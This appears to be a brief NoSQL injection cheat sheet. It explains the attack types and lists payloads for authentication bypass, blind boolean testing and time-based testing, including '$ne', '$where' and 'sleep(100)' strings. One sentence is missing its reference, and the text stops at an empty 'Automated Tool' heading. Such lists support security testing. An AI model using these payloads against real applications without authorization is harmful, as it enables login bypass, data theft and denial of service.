NoSQL Injection

NoSQL Injection

NoSQL injection is a vulnerability where an attacker is able to interfere with the queries that an application makes to a NoSQL database. NoSQL injection may enable an attacker to:

• Bypass authentication or protection mechanisms.

• Extract or edit data.

• Cause a denial of service.

• Execute code on the server.

NoSQL databases store and retrieve data in a format other than traditional SQL relational tables. They use a wide range of query languages instead of a universal standard like SQL, and have fewer relational constraints.

There are two different types of NoSQL injection:

• Syntax injection - This occurs when you can break the NoSQL query syntax, enabling you to inject your own payload. The methodology is similar to that used in . However the nature of the attack varies significantly, as NoSQL databases use a range of query languages, types of query syntax, and different data structures.

• Operator injection - This occurs when you can use NoSQL query operators to manipulate queries.

Where & How to Inject Payloads

1. site.com/page?query=term || '1'=='1
2. site.com/page?user[$ne]=nobody

Simple Error Based NoSQL Injection Tests

'"\/$[].>

Blind Boolean Injection

{"$ne": -1}
{"$in": []}
{"$and": [ {"id": 5}, {"id": 6} ]}
{"$where":  "return true"}
{"$or": [{},{"foo":"1"}]}
site.com/page?query=term || '1'=='1
site.com/page?user[$ne]=nobody
site.com/page?user=;return true

You may need to try appending certain characters to correctly terminate the query:

//
%00
'
"
some number of closing brackets or braces, in some combination

Timing Based Injection

{"$where":  "sleep(100)"}
;sleep(100);

Automated Tool